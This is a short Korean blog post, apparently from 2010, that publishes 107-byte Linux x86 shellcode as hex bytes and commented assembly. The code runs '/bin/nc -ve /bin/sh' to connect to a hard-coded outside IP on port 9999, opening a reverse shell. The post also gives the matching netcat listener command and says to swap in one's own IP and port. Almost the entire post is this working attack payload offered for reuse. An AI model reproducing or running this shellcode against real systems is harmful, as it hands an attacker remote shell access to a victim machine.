Linux-x86 /bin/nc reverseshell 쉘코드 (107바이트)

2010/03/21 21:44

/*
/x31/xc0/x50/x68/x39/x39/x39/x39/x68/x31/x31/x39/x01/x88/x44/x24/x03/x68/x31/x33/x36/x2e/x68/x31/x31/x30/x2e/x68/x32/x31/x30/x2e/x68/x2f/x73/x68/x01/x88/x44/x24/x03/x68/x2f/x62/x69/x6e/x68/x2d/x76/x65/x01/x88/x44/x24/x03/x68/x2f/x6e/x63/x01/x88/x44/x24/x03/x68/x2f/x62/x69/x6e/x50/x8d/x5c/x24/x28/x53/x8d/x5c/x24/x1c/x53/x8d/x5c/x24/x18/x53/x8d/x5c/x24/x18/x53/x8d/x5c/x24/x14/x53/x8b/x1c/x24/x8d/x0c/x24/x31/xd2/xb0/x0b/xcd/x80
*/

.globl main

main:
xor %eax, %eax

push %eax
push $0x39393939 # 9999
push $0x01393131
movb %al, 0x3(%esp)
push $0x2e363331
push $0x2e303131
push $0x2e303132 # 210.110.136.119
push $0x0168732f
movb %al, 0x3(%esp)
push $0x6e69622f # /bin/sh
push $0x0165762d # -ve
movb %al, 0x3(%esp)
push $0x01636e2f
movb %al, 0x3(%esp)
push $0x6e69622f # /bin/nc

push %eax
lea 0x28(%esp), %ebx
push %ebx
lea 0x1c(%esp), %ebx
push %ebx
lea 0x18(%esp), %ebx
push %ebx
lea 0x18(%esp), %ebx
push %ebx
lea 0x14(%esp), %ebx
push %ebx

mov (%esp), %ebx
lea (%esp), %ecx
xor %edx, %edx
mov $0xb, %al
int $0x80 # execve("/bin/nc", "/bin/nc -ve /bin/sh [ip] [port]", NULL)


이것도 예전에 만들어두었던 리버스쉘을 띄우는 쉘코드입니다.

nc -l -p 9999


위와 같이 nc으로 대기한 채 쉘코드를 실행시키면 리버스쉘이 뜨지요. ip와 port는 적당히 수정하면 됩니다. 뭐, 107 바이트나 되는 무지막지한 녀석이라서 쓸 데가 있으려나 모르겠지만...
크리에이티브 커먼즈 라이센스
Creative Commons License

6l4ck3y3 0x03 Linux RCE , , , , , ,

Trackback Address:이 글에는 트랙백을 보낼 수 없습니다
[로그인][오픈아이디란?]